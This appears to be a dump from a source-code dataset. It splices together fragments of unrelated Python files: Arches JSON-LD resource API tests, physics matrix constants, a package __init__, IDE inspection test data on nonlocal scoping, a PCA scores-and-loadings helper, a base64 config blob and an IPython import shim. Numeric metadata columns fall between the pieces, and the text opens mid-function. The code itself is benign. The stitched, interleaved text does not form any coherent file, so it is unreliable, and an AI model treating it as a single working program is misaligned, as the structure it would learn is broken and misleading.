url = self._create_url(
graph_id="9f716aa2-bf96-11e9-bd39-0242ac160002",
resource_id="8e870000-114e-11ea-8de7-acde48001122",
)
response = self.client.put(url, data=data, HTTP_AUTHORIZATION=f"Bearer {self.token}")
self.assertEqual(response.status_code, 201)
js = response.json()
if type(js) == list:
js = js[0]
self.assertTrue("@id" in js)
self.assertTrue(js["@id"] == "http://localhost:8000/resources/8e870000-114e-11ea-8de7-acde48001122")
rtb = "http://www.cidoc-crm.org/cidoc-crm/P67i_is_referred_to_by"
note = "http://www.cidoc-crm.org/cidoc-crm/P3_has_note"
self.assertTrue(rtb in js)
self.assertTrue(len(js[rtb]) == 2)
rtb1 = js[rtb][0]
rtb2 = js[rtb][1]
if note in rtb1:
self.assertTrue(rtb2["@id"].startswith("http://localhost:8000/resources"))
else:
self.assertTrue(rtb1["@id"].startswith("http://localhost:8000/resources"))
def test_f_big_nest_mess(self):
data = """{
"@id": "http://localhost:8000/resources/c3b693cc-1542-11ea-b353-acde48001122",
"@type": "http://www.cidoc-crm.org/cidoc-crm/E22_Man-Made_Object",
"http://www.cidoc-crm.org/cidoc-crm/P108i_was_produced_by": [
{
"@type": "http://www.cidoc-crm.org/cidoc-crm/E12_Production",
"http://www.cidoc-crm.org/cidoc-crm/P10_falls_within": [
{
"@type": "http://www.cidoc-crm.org/cidoc-crm/E12_Production",
"http://www.cidoc-crm.org/cidoc-crm/P14_carried_out_by": {
"@id": "http://localhost:8000/resources/5e9baff0-109b-11ea-957a-acde48001122",
"@type": "http://www.cidoc-crm.org/cidoc-crm/E21_Person"
},
"http://www.cidoc-crm.org/cidoc-crm/P3_has_note": "asdf",
"http://www.cidoc-crm.org/cidoc-crm/P4_has_time-span": {
"@type": "http://www.cidoc-crm.org/cidoc-crm/E52_Time-Span",
"http://www.cidoc-crm.org/cidoc-crm/P82a_begin_of_the_begin": {
"@type": "http://www.w3.org/2001/XMLSchema#dateTime",
"@value": "2019-12-03"
},
"http://www.cidoc-crm.org/cidoc-crm/P82b_end_of_the_end": {
"@type": "http://www.w3.org/2001/XMLSchema#dateTime",
"@value": "2019-12-05"
},
"http://www.cidoc-crm.org/cidoc-crm/P83_had_at_least_duration": {
"@type": "http://www.cidoc-crm.org/cidoc-crm/E54_Dimension",
"http://www.cidoc-crm.org/cidoc-crm/P90_has_value": 1
}
}
},
{
"@type": "http://www.cidoc-crm.org/cidoc-crm/E12_Production",
"http://www.cidoc-crm.org/cidoc-crm/P3_has_note": "second part",
"http://www.cidoc-crm.org/cidoc-crm/P4_has_time-span": {
"@type": "http://www.cidoc-crm.org/cidoc-crm/E52_Time-Span",
"http://www.cidoc-crm.org/cidoc-crm/P83_had_at_least_duration": {
"@type": "http://www.cidoc-crm.org/cidoc-crm/E54_Dimension",
"http://www.cidoc-crm.org/cidoc-crm/P90_has_value": 6
}
}
}
]
},
{
"@type": "http://www.cidoc-crm.org/cidoc-crm/E12_Production",
"http://www.cidoc-crm.org/cidoc-crm/P10_falls_within": {
"@type": "http://www.cidoc-crm.org/cidoc-crm/E12_Production",
"http://www.cidoc-crm.org/cidoc-crm/P3_has_note": "bar",
"http://www.cidoc-crm.org/cidoc-crm/P4_has_time-span": {
"@type": "http://www.cidoc-crm.org/cidoc-crm/E52_Time-Span",
"http://www.cidoc-crm.org/cidoc-crm/P82a_begin_of_the_begin": {
"@type": "http://www.w3.org/2001/XMLSchema#dateTime",
"@value": "2019-12-07"
},
"http://www.cidoc-crm.org/cidoc-crm/P82b_end_of_the_end": {
"@type": "http://www.w3.org/2001/XMLSchema#dateTime",
"@value": "2019-12-08"
}
}
}
}
],
"http://www.cidoc-crm.org/cidoc-crm/P138i_has_representation": {
"@type": "http://www.cidoc-crm.org/cidoc-crm/E36_Visual_Item",
"http://www.cidoc-crm.org/cidoc-crm/P2_has_type": {
"@id": "http://localhost:8000/concepts/36c8d7a3-32e7-49e4-bd4c-2169a06b240a",
"@type": "http://www.cidoc-crm.org/cidoc-crm/E55_Type",
"http://www.w3.org/2000/01/rdf-schema#label": "material a"
}
}
}
"""
with open(os.path.join("tests/fixtures/jsonld_base/models/nest_test.json"), "r") as f:
archesfile = JSONDeserializer().deserialize(f)
ResourceGraphImporter(archesfile["graph"])
url = self._create_url(
graph_id="9b596906-1540-11ea-b353-acde48001122",
resource_id="c3b693cc-1542-11ea-b353-acde48001122",
)
response = self.client.put(url, data=data, HTTP_AUTHORIZATION=f"Bearer {self.token}")
self.assertEqual(response.status_code, 201)
js = response.json()
if type(js) == list:
js = js[0]
self.assertTrue("@id" in js)
self.assertTrue(js["@id"] == "http://localhost:8000/resources/c3b693cc-1542-11ea-b353-acde48001122")
# TODO - more asserts to make sure data is saved correctly
def test_g_6235_parenttile(self):
data = """{
"@id": "http://localhost:8000/resources/05f314d0-7a7b-4408-8d9b-f0b61f1fb27d",
"@type": "http://www.cidoc-crm.org/cidoc-crm/E22_Man-Made_Object",
"http://www.cidoc-crm.org/cidoc-crm/P108i_was_produced_by": {
"@type": "http://www.cidoc-crm.org/cidoc-crm/E12_Production",
"http://www.cidoc-crm.org/cidoc-crm/P1_is_identified_by": {
"@type": "http://www.cidoc-crm.org/cidoc-crm/E41_Appellation",
"http://www.cidoc-crm.org/cidoc-crm/P3_has_note": "a"
},
"http://www.cidoc-crm.org/cidoc-crm/P4_has_time-span": {
"@type": "http://www.cidoc-crm.org/cidoc-crm/E52_Time-Span",
"http://www.cidoc-crm.org/cidoc-crm/P82a_begin_of_the_begin": {
"@type": "http://www.w3.org/2001/XMLSchema#dateTime", "@value": "2020-07-08"}
},
"http://www.cidoc-crm.org/cidoc-crm/P67i_is_referred_to_by": {
"@type": "http://www.cidoc-crm.org/cidoc-crm/E33_Linguistic_Object",
"http://www.cidoc-crm.org/cidoc-crm/P3_has_note": "b"
}
},
"http://www.cidoc-crm.org/cidoc-crm/P1_is_identified_by": {
"@type": "http://www.cidoc-crm.org/cidoc-crm/E41_Appellation",
"http://www.cidoc-crm.org/cidoc-crm/P3_has_note": "test 1"
}
}
"""
url = self._create_url(
graph_id="0bc001c2-c163-11ea-8354-3af9d3b32b71",
resource_id="05f314d0-7a7b-4408-8d9b-f0b61f1fb27d",
)
response = self.client.put(url, data=data, HTTP_AUTHORIZATION=f"Bearer {self.token}")
self.assertEqual(response.status_code, 201)
js = response.json()
if type(js) == list:
js = js[0]
# And validate that all three of E52, E33 and E41 are there
prod = js["http://www.cidoc-crm.org/cidoc-crm/P108i_was_produced_by"]
self.assertTrue("http://www.cidoc-crm.org/cidoc-crm/P1_is_identified_by" in prod)
self.assertTrue("http://www.cidoc-crm.org/cidoc-crm/P4_has_time-span" in prod)
self.assertTrue("http://www.cidoc-crm.org/cidoc-crm/P67i_is_referred_to_by" in prod)
| 46.970514
| 139
| 0.569627
| 6,702
| 55,754
| 4.612951
| 0.100269
| 0.113339
| 0.085005
| 0.106256
| 0.823198
| 0.795252
| 0.778852
| 0.758442
| 0.74848
| 0.727876
| 0
| 0.097528
| 0.280375
| 55,754
| 1,186
| 140
| 47.010118
| 0.673022
| 0.029236
| 0
| 0.489754
| 0
| 0.11373
| 0.633636
| 0.05977
| 0
| 0
| 0
| 0.000843
| 0.128074
| 1
| 0.026639
| false
| 0.003074
| 0.050205
| 0
| 0.078893
| 0.016393
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
55e843a8b8a1250fd32fce30bd1d930c2732b052
| 2,766
|
py
|
Python
|
l2hmc-qcd/lattice/gauge/matrices.py
|
saforem2/l2hmc-qcd
|
b5fe06243fae663607b6c88e71373b68b19558fc
|
[
"Apache-2.0"
] | 32
|
2019-04-18T18:50:28.000Z
|
2022-03-31T18:30:48.000Z
|
l2hmc-qcd/lattice/gauge/matrices.py
|
saforem2/l2hmc-qcd
|
b5fe06243fae663607b6c88e71373b68b19558fc
|
[
"Apache-2.0"
] | 21
|
2019-09-09T21:10:48.000Z
|
2022-02-26T17:43:51.000Z
|
l2hmc-qcd/lattice/gauge/matrices.py
|
saforem2/l2hmc-qcd
|
b5fe06243fae663607b6c88e71373b68b19558fc
|
[
"Apache-2.0"
] | 4
|
2020-10-31T02:25:04.000Z
|
2021-05-25T00:49:14.000Z
|
import numpy as np

# Gell-Mann, Pauli, and Dirac matrix constants. The alias np.complex was
# deprecated and later removed from NumPy, so the concrete dtype
# np.complex128 is used throughout.
GELLMANN_MATRICES = np.array([
    np.matrix([  # lambda_1
        [0, 1, 0],
        [1, 0, 0],
        [0, 0, 0],
    ], dtype=np.complex128),
    np.matrix([  # lambda_2 (sign fixed: the standard generator is [[0, -i, 0], [i, 0, 0], [0, 0, 0]]; +i in both off-diagonal slots is not Hermitian)
        [0, -1j, 0],
        [+1j, 0, 0],
        [0, 0, 0],
    ], dtype=np.complex128),
    np.matrix([  # lambda_3
        [+1, 0, 0],
        [0, -1, 0],
        [0, 0, 0],
    ], dtype=np.complex128),
    np.matrix([  # lambda_4
        [0, 0, 1],
        [0, 0, 0],
        [1, 0, 0],
    ], dtype=np.complex128),
    np.matrix([  # lambda_5
        [0, 0, -1j],
        [0, 0, 0],
        [+1j, 0, 0],
    ], dtype=np.complex128),
    np.matrix([  # lambda_6
        [0, 0, 0],
        [0, 0, 1],
        [0, 1, 0],
    ], dtype=np.complex128),
    np.matrix([  # lambda_7
        [0, 0, 0],
        [0, 0, -1j],
        [0, 1j, 0],
    ], dtype=np.complex128),
    np.matrix([  # lambda_8
        [+1, 0, 0],
        [0, +1, 0],
        [0, 0, -2],
    ], dtype=np.complex128) / np.sqrt(3),
])

PAULI_MATRICES = np.array([
    np.matrix([
        [0, 1],
        [1, 0],
    ], dtype=np.complex128),
    np.matrix([
        [0, -1j],
        [+1j, 0],
    ], dtype=np.complex128),
    np.matrix([
        [+1, 0],
        [0, -1],
    ], dtype=np.complex128),
])

DIRAC_MATRICES = np.array([
    np.matrix([
        [+1, 0, 0, 0],
        [0, +1, 0, 0],
        [0, 0, -1, 0],
        [0, 0, 0, -1],
    ], dtype=np.complex128),
    np.matrix([
        [0, 0, 0, +1],
        [0, 0, +1, 0],
        [0, -1, 0, 0],
        [-1, 0, 0, 0],
    ], dtype=np.complex128),
    np.matrix([
        [0, 0, 0, -1j],
        [0, 0, +1j, 0],
        [0, +1j, 0, 0],
        [-1j, 0, 0, 0],
    ], dtype=np.complex128),
    np.matrix([
        [0, 0, +1, 0],
        [0, 0, 0, -1],
        [-1, 0, 0, 0],
        [0, +1, 0, 0],
    ], dtype=np.complex128),
])

CHIRAL_DIRAC_MATRICES = np.array([
    np.matrix([
        [0, 0, +1, 0],
        [0, 0, 0, +1],
        [+1, 0, 0, 0],
        [0, +1, 0, 0],
    ], dtype=np.complex128),
    np.matrix([
        [0, 0, 0, +1j],
        [0, 0, +1j, 0],
        [0, -1j, 0, 0],
        [-1j, 0, 0, 0],
    ], dtype=np.complex128),
    np.matrix([
        [0, 0, 0, -1j],
        [0, 0, +1j, 0],
        [0, +1j, 0, 0],
        [-1j, 0, 0, 0],
    ], dtype=np.complex128),
    np.matrix([
        [0, 0, +1j, 0],
        [0, 0, 0, -1j],
        [-1j, 0, 0, 0],
        [0, 1j, 0, 0],
    ], dtype=np.complex128),
])

GAMMA_5 = np.matrix([
    [0, 0, +1, 0],
    [0, 0, 0, +1],
    [+1, 0, 0, 0],
    [0, +1, 0, 0],
], dtype=np.complex128)

CHIRAL_GAMMA_5 = np.matrix([
    [+1, 0, 0, 0],
    [0, +1, 0, 0],
    [0, 0, -1, 0],
    [0, 0, 0, -1],
], dtype=np.complex128)

ETA = np.matrix([
    [-1, 0, 0, 0],
    [0, +1, 0, 0],
    [0, 0, +1, 0],
    [0, 0, 0, +1],
], dtype=np.int8)
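A quick self-check guards these constants against sign slips like the one corrected in lambda_2 above: the Gell-Mann matrices must be traceless, Hermitian, and orthonormal under tr(lambda_a lambda_b) = 2 delta_ab, and the Pauli matrices must square to the identity and pairwise anticommute. A minimal sketch; the import path mirrors the repository layout and is otherwise an assumption:

import numpy as np

from lattice.gauge.matrices import GELLMANN_MATRICES, PAULI_MATRICES

# Gell-Mann matrices: traceless, Hermitian, tr(lambda_a lambda_b) = 2 delta_ab.
for a, la in enumerate(GELLMANN_MATRICES):
    assert abs(np.trace(la)) < 1e-12
    assert np.allclose(la, la.conj().T)
    for b, lb in enumerate(GELLMANN_MATRICES):
        assert np.isclose(np.trace(la @ lb).real, 2.0 if a == b else 0.0)

# Pauli matrices: sigma_i^2 = I and {sigma_i, sigma_j} = 0 for i != j.
identity = np.eye(2)
for i, si in enumerate(PAULI_MATRICES):
    assert np.allclose(si @ si, identity)
    for j, sj in enumerate(PAULI_MATRICES):
        if i != j:
            assert np.allclose(si @ sj + sj @ si, np.zeros((2, 2)))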
| 19.478873
| 38
| 0.350325
| 416
| 2,766
| 2.290865
| 0.067308
| 0.253935
| 0.192025
| 0.109129
| 0.909759
| 0.87723
| 0.755509
| 0.637985
| 0.593914
| 0.549843
| 0
| 0.163363
| 0.398048
| 2,766
| 141
| 39
| 19.617021
| 0.409009
| 0.025669
| 0
| 0.80315
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.007874
| 0
| 0.007874
| 0
| 0
| 0
| 0
| null | 1
| 1
| 0
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
36327dacb05b912490510d0e51b847bf4f7554c7
| 142
|
py
|
Python
|
controllers/__init__.py
|
rbaylon/ngi
|
97907dd687e15d35449f6cf850b6b37e379114ba
|
[
"BSD-3-Clause"
] | null | null | null |
controllers/__init__.py
|
rbaylon/ngi
|
97907dd687e15d35449f6cf850b6b37e379114ba
|
[
"BSD-3-Clause"
] | null | null | null |
controllers/__init__.py
|
rbaylon/ngi
|
97907dd687e15d35449f6cf850b6b37e379114ba
|
[
"BSD-3-Clause"
] | null | null | null |
from .default_controllers import *
from .person_controllers import *
from .ngi_controllers import *
from .accounting_controllers import *
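The package `__init__` above re-exports every public name from its four controller modules. With star imports, each submodule controls what leaks into the package namespace via `__all__` (or, absent that, every name without a leading underscore). A minimal sketch of how one such module might scope its exports; the names below are hypothetical and not taken from the rbaylon/ngi sources:

# person_controllers.py (hypothetical contents)
__all__ = ["create_person", "get_person"]  # the only names the star import exposes

def create_person(payload):
    """Create a person record (placeholder logic)."""
    return {"created": payload}

def get_person(person_id):
    """Fetch a person record (placeholder logic)."""
    return {"id": person_id}

def _validate(payload):
    # Underscore prefix plus omission from __all__ keeps this helper out of
    # 'from .person_controllers import *'.
    return bool(payload)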
| 28.4
| 38
| 0.802817
| 16
| 142
| 6.875
| 0.4375
| 0.618182
| 0.572727
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.140845
| 142
| 4
| 39
| 35.5
| 0.901639
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
3d1307090707689106710668a615c1edb1432cda
| 524
|
py
|
Python
|
python/testData/inspections/PyUnboundLocalVariableInspection/UnboundNonLocal.py
|
jnthn/intellij-community
|
8fa7c8a3ace62400c838e0d5926a7be106aa8557
|
[
"Apache-2.0"
] | 2
|
2019-04-28T07:48:50.000Z
|
2020-12-11T14:18:08.000Z
|
python/testData/inspections/PyUnboundLocalVariableInspection/UnboundNonLocal.py
|
Cyril-lamirand/intellij-community
|
60ab6c61b82fc761dd68363eca7d9d69663cfa39
|
[
"Apache-2.0"
] | 173
|
2018-07-05T13:59:39.000Z
|
2018-08-09T01:12:03.000Z
|
python/testData/inspections/PyUnboundLocalVariableInspection/UnboundNonLocal.py
|
Cyril-lamirand/intellij-community
|
60ab6c61b82fc761dd68363eca7d9d69663cfa39
|
[
"Apache-2.0"
] | 2
|
2020-03-15T08:57:37.000Z
|
2020-04-07T04:48:14.000Z
|
def f1():
nonlocal <warning descr="Nonlocal variable 'x' must be bound in an outer function scope">x</warning> #fail
def f2():
def g():
nonlocal <warning descr="Nonlocal variable 'x' must be bound in an outer function scope">x</warning> #fail
print(x)
x = 1
def f3():
nonlocal <warning descr="Nonlocal variable 'x' must be bound in an outer function scope">x</warning> #fail
x = 2
def f4():
x = 0
def g():
nonlocal x #pass
x = 2
return x
return g()
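The `<warning descr=...>` markers above encode where the IDE inspection is expected to fire. CPython enforces the same rule at compile time: a `nonlocal` declaration with no binding in an enclosing function scope is a SyntaxError. A minimal sketch reproducing the first failing case (the exact message wording can vary across Python versions):

import textwrap

src = textwrap.dedent("""
    def f1():
        nonlocal x
""")
try:
    compile(src, "<test>", "exec")
except SyntaxError as exc:
    print(exc.msg)  # e.g. "no binding for nonlocal 'x' found"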
| 20.96
| 114
| 0.601145
| 80
| 524
| 3.9375
| 0.325
| 0.142857
| 0.190476
| 0.266667
| 0.780952
| 0.780952
| 0.780952
| 0.780952
| 0.780952
| 0.780952
| 0
| 0.021333
| 0.284351
| 524
| 24
| 115
| 21.833333
| 0.818667
| 0.030534
| 0
| 0.411765
| 0
| 0
| 0.369048
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0
| null | null | 0.058824
| 0
| 0
| 0
| null | 0
| 1
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
3d3663243c8a1047ff6913e3089750fe679e94fc
| 6,310
|
py
|
Python
|
python_statistics/calculate_pca.py
|
dmccloskey/python_statistics
|
150ca2baedd00281ec5af5aff94fc90b5a1e1e4f
|
[
"MIT"
] | null | null | null |
python_statistics/calculate_pca.py
|
dmccloskey/python_statistics
|
150ca2baedd00281ec5af5aff94fc90b5a1e1e4f
|
[
"MIT"
] | null | null | null |
python_statistics/calculate_pca.py
|
dmccloskey/python_statistics
|
150ca2baedd00281ec5af5aff94fc90b5a1e1e4f
|
[
"MIT"
] | null | null | null |
from .calculate_dependencies import *
from .calculate_base import calculate_base
import copy  # used below; may also be provided by the star import above

class calculate_pca(calculate_base):
    def calculate_pca(self):
        '''calculate PCA
        sklearn.decomposition.PCA(n_components=None, copy=True, whiten=False)

        from sklearn.datasets import load_iris
        iris = load_iris()
        X, y = iris.data, iris.target
        from sklearn.decomposition import PCA
        pca = PCA()
        pca.fit(X_blob)
        X_pca = pca.transform(X_blob)
        plt.scatter(X_pca[:, 0], X_pca[:, 1], c=y, linewidths=0, s=30)
        plt.xlabel("first principal component")
        plt.ylabel("second principal component")
        plt.title("Cumulated Explained Variance")
        plt.ylabel("Percentage of explained variance")
        plt.xlabel("PCA Components")
        plt.plot(np.cumsum(pca_big.explained_variance_ratio_))
        '''
        pass

    def extract_scoresAndLoadings_2D_v1(self, data_scores, data_loadings, PCs):
        '''Extract out the scores and loadings
        INPUT:
        data_scores = listDict of pca/pls scores
        data_loadings = listDict of pca/pls loadings
        PCs = [[],[],...] of integers, describing the 2D PC plots
            E.G. PCs = [[1,2],[1,3],[2,3]]
        OUTPUT:
        data_scores_O = {'[1,2]':[],'[1,3]':[],'[2,3]':[],...} where each [] is a listDict of the data from PCs e.g. 1,2
        data_loadings_O = {'[1,2]':[],'[1,3]':[],'[2,3]':[],...}
        '''
        data_scores_O, data_loadings_O = {}, {}
        for PC_cnt, PC in enumerate(PCs):
            # extract out the scores
            data_scores_O[str(PC)] = []
            for cnt, d in enumerate(data_scores[PC[0]][:]):
                if d['sample_name_short'] != data_scores[PC[1]][cnt]['sample_name_short'] and d['calculated_concentration_units'] != data_scores[PC[1]][cnt]['calculated_concentration_units']:
                    print('data is not in the correct order')
                tmp = copy.copy(d)
                tmp['score_' + str(PC[0])] = d['score']
                tmp['var_proportion_' + str(PC[0])] = d['var_proportion']
                tmp['var_cumulative_' + str(PC[0])] = d['var_cumulative']
                # tmp['axislabel' + str(PC[0])] = 'PC' + str(PC[0]) + ' [' + str(round(d['var_proportion']*100, 2)) + '%]'
                tmp['axislabel' + str(PC[0])] = 'PC' + str(PC[0])
                tmp['score_' + str(PC[1])] = data_scores[PC[1]][cnt]['score']
                # tmp['var_proportion_' + str(PC[1])] = data_scores[PC[1]][cnt]['var_proportion']
                # tmp['var_cumulative_' + str(PC[1])] = data_scores[PC[1]][cnt]['var_cumulative']
                # tmp['axislabel' + str(PC[1])] = 'PC' + str(PC[1]) + ' [' + str(round(data_scores[PC[1]][cnt]['var_proportion']*100, 2)) + '%]'
                tmp['axislabel' + str(PC[1])] = 'PC' + str(PC[1])
                del tmp['score']
                del tmp['axis']
                del tmp['var_proportion']
                del tmp['var_cumulative']
                data_scores_O[str(PC)].append(tmp)
            # extract out the loadings
            data_loadings_O[str(PC)] = []
            for cnt, d in enumerate(data_loadings[PC[0]][:]):
                if d['component_name'] != data_loadings[PC[1]][cnt]['component_name'] and d['calculated_concentration_units'] != data_loadings[PC[1]][cnt]['calculated_concentration_units']:
                    print('data is not in the correct order')
                tmp = copy.copy(d)
                tmp['loadings_' + str(PC[0])] = d['loadings']
                tmp['axislabel' + str(PC[0])] = 'Loadings' + str(PC[0])
                tmp['loadings_' + str(PC[1])] = data_loadings[PC[1]][cnt]['loadings']
                tmp['axislabel' + str(PC[1])] = 'Loadings' + str(PC[1])
                del tmp['loadings']
                del tmp['axis']
                data_loadings_O[str(PC)].append(tmp)
        return data_scores_O, data_loadings_O

    def extract_scoresAndLoadings_2D(self, data_scores, data_loadings, PCs):
        '''Extract out the scores and loadings
        INPUT:
        data_scores = listDict of pca/pls scores
        data_loadings = listDict of pca/pls loadings
        PCs = [[],[],...] of integers, describing the 2D PC plots
            E.G. PCs = [[1,2],[1,3],[2,3]]
        OUTPUT:
        data_scores_O = {'[1,2]':[],'[1,3]':[],'[2,3]':[],...} where each [] is a listDict of the data from PCs e.g. 1,2
        data_loadings_O = {'[1,2]':[],'[1,3]':[],'[2,3]':[],...}
        '''
        data_scores_O, data_loadings_O = {}, {}
        for PC_cnt, PC in enumerate(PCs):
            # extract out the scores
            data_scores_O[str(PC)] = []
            for cnt, d in enumerate(data_scores[PC[0]][:]):
                if d['sample_name_short'] != data_scores[PC[1]][cnt]['sample_name_short'] and d['calculated_concentration_units'] != data_scores[PC[1]][cnt]['calculated_concentration_units']:
                    print('data is not in the correct order')
                tmp = copy.copy(d)
                tmp['score_' + str(PC[0])] = d['score']
                tmp['axislabel' + str(PC[0])] = 'PC' + str(PC[0])
                tmp['score_' + str(PC[1])] = data_scores[PC[1]][cnt]['score']
                tmp['axislabel' + str(PC[1])] = 'PC' + str(PC[1])
                del tmp['score']
                del tmp['axis']
                data_scores_O[str(PC)].append(tmp)
            # extract out the loadings
            data_loadings_O[str(PC)] = []
            for cnt, d in enumerate(data_loadings[PC[0]][:]):
                if d['component_name'] != data_loadings[PC[1]][cnt]['component_name'] and d['calculated_concentration_units'] != data_loadings[PC[1]][cnt]['calculated_concentration_units']:
                    print('data is not in the correct order')
                tmp = copy.copy(d)
                tmp['loadings_' + str(PC[0])] = d['loadings']
                tmp['axislabel' + str(PC[0])] = 'Loadings' + str(PC[0])
                tmp['loadings_' + str(PC[1])] = data_loadings[PC[1]][cnt]['loadings']
                tmp['axislabel' + str(PC[1])] = 'Loadings' + str(PC[1])
                del tmp['loadings']
                del tmp['axis']
                data_loadings_O[str(PC)].append(tmp)
        return data_scores_O, data_loadings_O
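The docstring of `calculate_pca` above sketches the intended sklearn workflow but references undefined names (`X_blob`, `pca_big`). A runnable version of that sketch under the standard sklearn API, with plotting reduced to printed summaries:

import numpy as np
from sklearn.datasets import load_iris
from sklearn.decomposition import PCA

iris = load_iris()
X, y = iris.data, iris.target

pca = PCA()                    # keep all components
X_pca = pca.fit_transform(X)   # scores, shape (n_samples, n_components)

print(X_pca[:, :2].shape)                        # first two PCs for a 2D plot
print(np.cumsum(pca.explained_variance_ratio_))  # cumulative explained variance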
| 51.300813
| 191
| 0.538193
| 820
| 6,310
| 3.967073
| 0.135366
| 0.061482
| 0.029511
| 0.052259
| 0.79127
| 0.79004
| 0.77344
| 0.750077
| 0.739625
| 0.708269
| 0
| 0.024014
| 0.280666
| 6,310
| 122
| 192
| 51.721311
| 0.692443
| 0.075119
| 0
| 0.830769
| 0
| 0
| 0.204309
| 0.058097
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0.015385
| 0.030769
| null | null | 0.061538
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
3d461a39ec3b53bbc99bca100ba9c29ed256049c
| 978
|
py
|
Python
|
lib/config/initConfig.py
|
silent-rain/remoteControl
|
d4bc6b1d1a869371c6ddf2f656cbefbd521fab33
|
[
"Apache-2.0"
] | 1
|
2020-06-07T14:28:00.000Z
|
2020-06-07T14:28:00.000Z
|
lib/config/initConfig.py
|
silent-rain/remoteControl
|
d4bc6b1d1a869371c6ddf2f656cbefbd521fab33
|
[
"Apache-2.0"
] | null | null | null |
lib/config/initConfig.py
|
silent-rain/remoteControl
|
d4bc6b1d1a869371c6ddf2f656cbefbd521fab33
|
[
"Apache-2.0"
] | 3
|
2021-04-29T00:36:04.000Z
|
2022-03-10T10:29:22.000Z
|
DATA = "W2RlZmF1bHRdDQoNCg0KDQpbYWRkcmVzc10NCiMg55uR5ZCs5Zyw5Z2ADQppcCA9IDEyNy4wLjAuMQ0KIyDnm5HlkKznq6/lj6MNCnBvcnQgPSA4MDkwDQoNCg0KW3N5c3RlbV0NCiMg6L+b56iL5pWwDQpwcm9jZXNzZXMgPSA0DQoNCg0KW2VmZmVjdF0NCiMg5byA5ZCv5Yqg6L2954m55pWI5piv5ZCm5omT5byADQo7MO+8muWFs+mXrSAx77ya5byA5ZCvDQpsb2FkX2VmZmVjdF9vbiA9IDENCg0KIyDpgI/mmI7luqYNCjswLjAtMS4wDQp0cmFuc3BhcmVudCA9IDAuOA0KDQojIOearuiCpOWIneWni+WMlg0Kc2tpbl9jb2xvciA9ICgxMDcsIDE3MywgMjQ2KQ0KDQpbYXVkaW9dDQojIOWjsOmfs+aYr+WQpuW8gOWQrw0KOzDvvJrlhbPpl60gMe+8muW8gOWQrw0Kc291bmRfb24gPSAxDQoNCg0KW3ZpZXddDQojIOW3peWFt+euseaJqeWxleaYr+WQpuaYvuekug0KOzDvvJog6ZqQ6JePICAx77yaIOaYvuekug0KdG9vbHNfZXh0ZW5zaW9uX3Nob3cgPSAxDQoNCiMg5bel5YW35qCP5piv5ZCm5pi+56S6DQo7MO+8miDpmpDol48gIDHvvJog5pi+56S6DQp0b29sYmFyX3Nob3cgPSAxDQoNCiMg54q25oCB5qCP5piv5ZCm5pi+56S6DQo7MO+8miDpmpDol48gIDHvvJog5pi+56S6DQpzdGF0dXNiYXJfc2hvdyA9IDENCg0KDQpbbG9nZ2luZ10NCiMg5pel5b+X5omT5Y2w57qn5YirDQo7IERFQlVHL0lORk8vV0FSTklORy9FUlJPUi9DUklUSUNBTA0KbG9nZ2luZ19sZXZlbCA9IERFQlVH"
| 489
| 977
| 0.97546
| 20
| 978
| 47.7
| 0.9
| 0.071279
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.173333
| 0.003067
| 978
| 1
| 978
| 978
| 0.805128
| 0
| 0
| 0
| 0
| 1
| 0.989775
| 0.989775
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
181730acb2cf8849ce8e526225e6f2dc08c0445a
| 152
|
py
|
Python
|
oscar/lib/python2.7/site-packages/IPython/utils/daemonize.py
|
sainjusajan/django-oscar
|
466e8edc807be689b0a28c9e525c8323cc48b8e1
|
[
"BSD-3-Clause"
] | null | null | null |
oscar/lib/python2.7/site-packages/IPython/utils/daemonize.py
|
sainjusajan/django-oscar
|
466e8edc807be689b0a28c9e525c8323cc48b8e1
|
[
"BSD-3-Clause"
] | null | null | null |
oscar/lib/python2.7/site-packages/IPython/utils/daemonize.py
|
sainjusajan/django-oscar
|
466e8edc807be689b0a28c9e525c8323cc48b8e1
|
[
"BSD-3-Clause"
] | null | null | null |
from warnings import warn
warn("IPython.utils.daemonize has moved to ipyparallel.apps.daemonize")
from ipyparallel.apps.daemonize import daemonize
